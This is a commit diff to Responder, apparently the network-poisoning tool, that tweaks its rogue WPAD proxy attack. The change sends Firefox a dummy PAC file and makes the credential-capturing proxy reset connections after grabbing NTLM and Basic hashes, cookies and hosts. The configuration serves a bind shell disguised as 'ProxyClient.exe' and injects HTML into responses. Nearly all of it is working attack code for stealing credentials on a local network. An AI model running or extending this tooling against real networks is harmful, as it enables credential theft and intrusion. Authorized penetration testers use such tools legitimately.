Firefox blacklisted on WPAD since it doesn't honors fail-over proxies. Added SO_LINGER to send RST when close() is called.

2025-07-30 11:38:55 -07:00 · 2016-09-11 13:07:44 -03:00 · 2016-09-11 13:07:44 -03:00 · 29ad8a0816
commit 29ad8a0816
parent 23151fee42
5 changed files with 56 additions and 14 deletions
--- a/Responder.conf
+++ b/Responder.conf
@ -42,11 +42,11 @@ RespondToName =
 ; Specific IP Addresses not to respond to (default = None)
 ; Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10
-DontRespondTo = 
+DontRespondTo =
 ; Specific NBT-NS/LLMNR names not to respond to (default = None)
 ; Example: DontRespondTo = NAC, IPS, IDS
-DontRespondToName =
+DontRespondToName = ISATAP
 ; If set to On, we will stop answering further requests from a host
 ; if a hash hash been previously captured for this host.
@ -79,7 +79,7 @@ ExeFilename = files/BindShell.exe
 ExeDownloadName = ProxyClient.exe
 ; Custom WPAD Script
-WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY RespProxySrv:3128; PROXY RespProxySrv:3141; DIRECT';}
+WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "ProxySrv")||shExpMatch(host, "(*.ProxySrv|ProxySrv)")) return "DIRECT"; return 'PROXY ProxySrv:3128; PROXY ProxySrv:3141; DIRECT';}
 ; HTML answer to inject in HTTP responses (before </body> tag).
 ; Set to an empty string to disable.
--- a/Responder.py
+++ b/Responder.py
@ -20,7 +20,7 @@ import ssl
 from SocketServer import TCPServer, UDPServer, ThreadingMixIn
 from threading import Thread
 from utils import *
-
+import struct
 banner()
 parser = optparse.OptionParser(usage='python %prog -I eth0 -w -r -f\nor:\npython %prog -I eth0 -wrf', version=settings.__version__, prog=sys.argv[0])
@ -77,6 +77,16 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer):
 				pass
 		TCPServer.server_bind(self)
 class ThreadingTCPServerAuth(ThreadingMixIn, TCPServer):
 	def server_bind(self):
 		if OsInterfaceIsSupported():
 			try:
 				self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
 			except:
 				pass
                self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
 		TCPServer.server_bind(self)
 class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
 	def server_bind(self):
 		MADDR = "224.0.0.251"
@ -113,6 +123,7 @@ ThreadingUDPServer.allow_reuse_address = 1
 ThreadingTCPServer.allow_reuse_address = 1
 ThreadingUDPMDNSServer.allow_reuse_address = 1
 ThreadingUDPLLMNRServer.allow_reuse_address = 1
 ThreadingTCPServerAuth.allow_reuse_address = 1
 def serve_thread_udp_broadcast(host, port, handler):
 	try:
@ -160,6 +171,17 @@ def serve_thread_tcp(host, port, handler):
 	except:
 		print color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running."
 def serve_thread_tcp_auth(host, port, handler):
 	try:
 		if OsInterfaceIsSupported():
 			server = ThreadingTCPServerAuth((settings.Config.Bind_To, port), handler)
 			server.serve_forever()
 		else:
 			server = ThreadingTCPServerAuth((host, port), handler)
 			server.serve_forever()
 	except:
 		print color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running."
 def serve_thread_SSL(host, port, handler):
 	try:
@ -207,7 +229,7 @@ def main():
 		if settings.Config.ProxyAuth_On_Off:
 		        from servers.Proxy_Auth import Proxy_Auth
-		        threads.append(Thread(target=serve_thread_tcp, args=('', 3128, Proxy_Auth,)))
+		        threads.append(Thread(target=serve_thread_tcp_auth, args=('', 3128, Proxy_Auth,)))
 		if settings.Config.SMB_On_Off:
 			if settings.Config.LM_On_Off:
--- a/packets.py
+++ b/packets.py
@ -1583,3 +1583,4 @@ class SMB2Session2Data(Packet):
    ])
--- a/servers/HTTP.py
+++ b/servers/HTTP.py
@ -14,9 +14,9 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import struct
 from SocketServer import BaseRequestHandler, StreamRequestHandler
 from base64 import b64decode
 import struct
 from utils import *
 from packets import NTLM_Challenge
@ -103,9 +103,26 @@ def GrabReferer(data, host):
 		return Referer
 	return False
 def SpotFirefox(data):
 	UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data)
        print text("[HTTP] %s" % color("User-Agent        : "+UserAgent[0], 2))
 	if UserAgent:
                IsFirefox = re.search('Firefox', UserAgent[0])
                if IsFirefox:
                        print color("[WARNING]: Mozilla doesn't switch to fail-over proxies (as it should) when one's failing.", 1)
                        print color("[WARNING]: The current WPAD script will cause disruption on this host. Sending a dummy wpad script (DIRECT connect)", 1)
                        return True
                else:
 	               return False
 def WpadCustom(data, client):
 	Wpad = re.search(r'(/wpad.dat|/*\.pac)', data)
-	if Wpad:
+	if Wpad and SpotFirefox(data):
 		Buffer = WPADScript(Payload="function FindProxyForURL(url, host){return 'DIRECT';}")
 		Buffer.calculate()
 		return str(Buffer)
 	if Wpad and SpotFirefox(data) == False:
 		Buffer = WPADScript(Payload=settings.Config.WPAD_Script)
 		Buffer.calculate()
 		return str(Buffer)
--- a/servers/Proxy_Auth.py
+++ b/servers/Proxy_Auth.py
@ -19,6 +19,10 @@ from HTTP import ParseHTTPHash
 from packets import *
 from utils import *
 def GrabUserAgent(data):
 	UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data)
        print text("[Proxy-Auth] %s" % color("User-Agent        : "+UserAgent[0], 2))
 def GrabCookie(data):
 	Cookie = re.search(r'(Cookie:*.\=*)[^\r\n]*', data)
@ -59,13 +63,15 @@ def PacketSequence(data, client):
 		if Packet_NTLM == "\x03":
 			NTLM_Auth = b64decode(''.join(NTLM_Auth))
       	                ParseHTTPHash(NTLM_Auth, client, "Proxy-Auth")
                        GrabUserAgent(data)
                        GrabCookie(data)
                        GrabHost(data)
-   	                return False
+   	                return False #Send a RST with SO_LINGER when close() is called (see Responder.py)
 		else:
               		return False
 	elif Basic_Auth:
                GrabUserAgent(data)
                GrabCookie(data)
                GrabHost(data)
 		ClearText_Auth = b64decode(''.join(Basic_Auth))
@ -90,12 +96,7 @@ def PacketSequence(data, client):
 		return str(Response)
 class Proxy_Auth(SocketServer.BaseRequestHandler):
-     
+
    def server_bind(self):
       self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
       self.socket.bind(self.server_address)
       self.socket.setblocking(0)
       self.socket.setdefaulttimeout(1)
    def handle(self):
 		try:
@ -106,3 +107,4 @@ class Proxy_Auth(SocketServer.BaseRequestHandler):
 		except:
                   	pass
`@ -1583,3 +1583,4 @@ class SMB2Session2Data(Packet):`
	`])`	`])`